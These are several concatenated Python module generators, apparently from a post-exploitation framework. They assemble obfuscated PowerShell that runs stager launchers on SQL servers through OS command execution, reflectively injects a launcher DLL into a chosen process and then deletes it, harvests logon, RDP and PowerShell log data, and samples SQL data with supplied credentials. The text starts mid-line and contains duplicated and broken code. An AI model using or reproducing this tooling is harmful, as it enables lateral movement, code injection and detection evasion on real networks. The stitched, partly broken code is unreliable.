str(params['Port']) script_end += " -Cmd \"" + launcher + "\"" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): cred_id = params["CredID"] if cred_id != "": if not main_menu.credentials.is_credential_valid(cred_id): return handle_error_message("[!] CredID is invalid!") cred: Credential = main_menu.credentials.get_credentials(cred_id) if cred.domain != "": params["UserName"] = str(cred.domain) + "\\" + str( cred.username) else: params["UserName"] = str(cred.username) if cred.password != "": params["Password"] = cred.password # Set booleans to false by default obfuscate = False listener_name = params['Listener'] userAgent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] instance = params['Instance'] command = params['Command'] username = params['UserName'] password = params['Password'] if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] module_source = main_menu.installPath + "/data/module_source/lateral_movement/Invoke-SQLOSCmd.ps1" module_code = "" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: with open(module_source, 'r') as source: module_code = source.read() except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) script = module_code if command == "": if not main_menu.listeners.is_listener_valid(listener_name): return handle_error_message("[!] Invalid listener: " + listener_name) else: launcher = main_menu.stagers.generate_launcher( listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=userAgent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) if launcher == "": return handle_error_message( "[!] Error generating launcher") else: command = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher script_end = "Invoke-SQLOSCmd -Instance \"%s\" -Command \"%s\"" % ( instance, command) if username != "": script_end += " -UserName " + username if password != "": script_end += " -Password " + password if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False def rand_text_alphanumeric(size=15, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) fname = rand_text_alphanumeric() + ".dll" listener_name = params['Listener'] proc_name = params['ProcName'].strip() upload_path = params['UploadPath'].strip() arch = params['Arch'].strip() full_upload_path = upload_path + "\\" + fname if proc_name == '': return handle_error_message("[!] ProcName must be specified.") # staging options user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] # read in the common module source code module_source = main_menu.installPath + "/data/module_source/management/Invoke-ReflectivePEInjection.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "" if not main_menu.listeners.is_listener_valid(listener_name): # not a valid listener, return nothing for the script return handle_error_message("[!] Invalid listener: %s" % (listener_name)) else: # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher( listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) if launcher == '': return handle_error_message( '[!] Error in launcher generation.') else: launcher_code = launcher.split(' ')[-1] script_end += "Invoke-ReflectivePEInjection -PEPath %s -ProcName %s " % ( full_upload_path, proc_name) dll = main_menu.stagers.generate_dll(launcher_code, arch) upload_script = main_menu.stagers.generate_upload( dll, full_upload_path) if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += "\r\n" script += upload_script script += "\r\n" script += script_end script += "\r\n" script += "Remove-Item -Path %s" % full_upload_path script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/situational_awareness/host/Get-ComputerDetails.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code + "\n\n" script_end = "" outputf = params.get("OutputFunction", "Out-String") for option, values in params.items(): if option.lower() != "agent" and option.lower( ) != "outputfunction": if values and values != '': if option == "4624": script_end += "$SecurityLog = Get-EventLog -LogName Security; $Filtered4624 = Find-4624Logons $SecurityLog;" script_end += 'Write-Output "Event ID 4624 (Logon):`n";' script_end += "Write-Output $Filtered4624.Values" script_end += f" | {outputf}" script_end = data_util.keyword_obfuscation(script_end) for option, values in params.items(): if option.lower() != "agent" and option.lower( ) != "outputfunction": if values and values != '': if option == "4624": script_end += "$SecurityLog = Get-EventLog -LogName Security; $Filtered4624 = Find-4624Logons $SecurityLog;" script_end += 'Write-Output "Event ID 4624 (Logon):`n";' script_end += "Write-Output $Filtered4624.Values" script_end += f" | {outputf}" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end return script if option == "4648": script_end += "$SecurityLog = Get-EventLog -LogName Security; $Filtered4648 = Find-4648Logons $SecurityLog;" script_end += 'Write-Output "Event ID 4648 (Explicit Credential Logon):`n";' script_end += "Write-Output $Filtered4648.Values" script_end += f" | {outputf}" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end return script if option == "AppLocker": script_end += "$AppLockerLogs = Find-AppLockerLogs;" script_end += 'Write-Output "AppLocker Process Starts:`n";' script_end += "Write-Output $AppLockerLogs.Values" script_end += f" | {outputf}" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end return script if option == "PSLogs": script_end += "$PSLogs = Find-PSScriptsInPSAppLog;" script_end += 'Write-Output "PowerShell Script Executions:`n";' script_end += "Write-Output $PSLogs.Values" script_end += f" | {outputf}" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end return script if option == "SavedRDP": script_end += "$RdpClientData = Find-RDPClientConnections;" script_end += 'Write-Output "RDP Client Data:`n";' script_end += "Write-Output $RdpClientData.Values" script_end += f" | {outputf}" if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end return script # if we get to this point, no switched were specified script_end += "Get-ComputerDetails -Limit " + str(params['Limit']) if (outputf == "Out-String"): script_end += " -ToString | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' else: script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ) -> Tuple[Optional[str], Optional[str]]: # First method: Read in the source script from module_source module_source = main_menu.installPath + "/data/module_source/..." if obfuscate: data_util.obfuscate_module( moduleSource=module_source, obfuscationCommand=obfuscation_command ) module_source = module_source.replace( "module_source", "obfuscated_module_source" ) try: f = open(module_source, "r") except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source) ) module_code = f.read() f.close() # If you'd just like to import a subset of the functions from the # module source, use the following: # script = helpers.generate_dynamic_powershell_script(module_code, ["Get-Something", "Set-Something"]) script = module_code # Second method: For calling your imported source, or holding your # inlined script. If you're importing source using the first method, # ensure that you append to the script variable rather than set. # # The script should be stripped of comments, with a link to any # original reference script included in the comments. # # If your script is more than a few lines, it's probably best to use # the first method to source it. # # script += """ script = """ function Invoke-Something { } Invoke-Something""" scriptEnd = "" # Add any arguments to the end execution of the script for option, values in params.items(): if option.lower() != "agent": if values and values != "": if values.lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values) if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, installPath=main_menu.installPath, obfuscationCommand=obfuscation_command, ) script += scriptEnd script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): username = params["Username"] password = params["Password"] instance = params["Instance"] no_defaults = params["NoDefaults"] check_all = params["CheckAll"] script_end = "" # read in the common module source code script, err = main_menu.modules.get_module_source( module_name="collection/Get-SQLColumnSampleData.ps1", obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if check_all: aux_module_source = main_menu.modules.get_module_source( module_name= "situational_awareness/network/Get-SQLInstanceDomain.ps1", obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if obfuscate: data_util.obfuscate_module( moduleSource=aux_module_source, obfuscationCommand=obfuscation_command, ) aux_module_source = module_source.replace( "module_source", "obfuscated_module_source") try: with open(aux_module_source, "r") as auxSource: aux_script = auxSource.read() script += " " + aux_script except: print( helpers.color( "[!] Could not read additional module source path at: " + str(aux_module_source))) script_end = " Get-SQLInstanceDomain " if username != "": script_end += " -Username " + username if password != "": script_end += " -Password " + password script_end += " | " script_end += " Get-SQLColumnSampleData" if username != "": script_end += " -Username " + username if password != "": script_end += " -Password " + password if instance != "" and not check_all: script_end += " -Instance " + instance if no_defaults: script_end += " -NoDefaults " outputf = params.get("OutputFunction", "Out-String") script_end += (f" | {outputf} | " + '%{$_ + "`n"};"`n' + str(module.name.split("/")[-1]) + ' completed!"') script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script